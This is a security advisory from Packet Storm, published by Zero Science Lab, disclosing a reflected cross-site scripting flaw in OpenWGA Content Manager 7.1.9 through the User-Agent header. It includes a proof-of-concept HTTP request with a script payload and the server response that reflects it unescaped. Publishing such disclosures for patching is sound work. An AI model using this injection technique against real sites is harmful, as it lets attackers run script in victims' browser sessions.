OpenWGA Content Manager 7.1.9 User-Agent HTTP Header XSS

Type packetstorm
Reporter LiquidWorm
Modified 2016-04-13T00:00:00


OpenWGA Content Manager 7.1.9 User-Agent HTTP Header XSS Vulnerability  
Vendor: Innovation Gate GmbH  
Product web page:  
Affected version: OpenWGA Content Manager 7.1.9 (Build 230)  
OpenWGA Admin Client 7.1.7 (Build 82)  
OpenWGA Server 7.1.9 Maintenance Release (Build 642)  
Summary: OpenWGA is an advanced open source java based enterprise CMS  
platform featuring real WYSIWYG, a state of the art CMS IDE and more.  
Desc: OpenWGA suffers from a cross-site scripting vulnerability when  
input passed via the User-Agent HTTP header is not properly sanitized  
before being returned to the user. This can be exploited to execute  
arbitrary HTML and script code in a user's browser session in context  
of an affected site.  
Tested on: Apache/2.2.14 (Ubuntu)  
Apache Tomcat/6.0.41  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Advisory ID: ZSL-2016-5316  
Advisory URL:  
GET /plugin-contentmanager HTTP/1.1  
Host: localhost:8080  
Accept: */*  
Accept-Language: en  
User-Agent: <script>alert(1)</script>  
Connection: close  
HTTP/1.1 200 OK  
Server: Apache-Coyote/1.1  
Set-Cookie: WGLastRedirectHex=; Path=/; Max-Age=0; HttpOnly  
Pragma: No-Cache  
Cache-Control: No-Cache  
Content-Type: text/html;charset=UTF-8  
Date: Tue, 23 Feb 2016 14:02:49 GMT  
Connection: close  
Content-Length: 1902  
<title>browser not supported: OpenWGA™ Content Manager Version 7.1.9 Build 230</title>  
<meta name="generator" content="OpenWGA... Server 7 'Wolf' Platform">  
<span style="font-weight:bold"><script>alert(1)</script></span>